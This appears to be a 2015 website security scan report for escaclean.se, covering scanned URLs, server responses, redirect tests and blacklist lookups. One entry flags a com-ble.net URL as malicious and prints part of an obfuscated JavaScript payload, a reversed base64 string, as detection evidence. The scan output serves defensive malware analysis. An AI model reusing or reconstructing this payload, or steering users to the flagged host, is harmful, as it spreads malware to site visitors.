Scanned pages/files
Request | Server response | Status |
http://escaclean.se/forth.php | HTTP/1.1 200 OK Date: Thu, 21 May 2015 18:22:45 GMT Server: Microsoft-IIS/7.5 Content-Length: 91 Content-Type: text/html X-Powered-By: PHP/5.5.11 X-Powered-By: ASP.NET | clean |
http://com-ble.net/?a=314759&c=wl_con&s=0117 | 200 OK Content-Length: 3220 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _010='=oQKpkyJ8dCK0lGbwNnLnE2MwATd8J2MwATd8Rnbl1Wdj9GZ8VGchN2cl5Wd8RmNwATd8JjNwATd8JXY2xXZ0lmc3xnN3ADM1xHZzADM1xXZyADM1x3YzADM1xXM3ADM1xHZyADM1xXO3ADM1xnN2ADM1xXYwADM1x3Y2ADM1xXY2ADM1xXZwF2YzV2X8V2MwATd8hzNwATd8xHO2ADM1x3N3ADM1xnMzADM1x3NyADM1xnMyADM1xHN2ADM1x3M2ADM1xHMyADM1xXZ2ADM1xHM3ADM1xnZ2ADM1xXM2ADM1xXN2ADM1xXO2ADM1xnM2w3N5wHM0wHN3ADM1xnZyADM1xnM3ADM1x3M3ADM1xnNzw3Zulmc0N1b0xXNzwHbhZXZ8BHeFdWZSxHdpxGczxHdulUZzJXYwxXZk92QyFGaD12byZGf3Vmb8dmbpJHdTxnZpxXZslGa3xXZjFGbwVmc852bpR3YuVnZ85mc1R Antivirus reports:
| ||
http://com-ble.net/test404page.js | 404 Not Found Content-Length: 590 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: escaclean.se
Result:
GET / HTTP/1.1
Host: escaclean.se
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: escaclean.se
Referer: http://www.google.com/search?q=escaclean.se
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: escaclean.se
Referer: http://www.google.com/search?q=escaclean.se
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=escaclean.se
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://escaclean.se/
Result: escaclean.se is not infected or malware details are not published yet.
Result: escaclean.se is not infected or malware details are not published yet.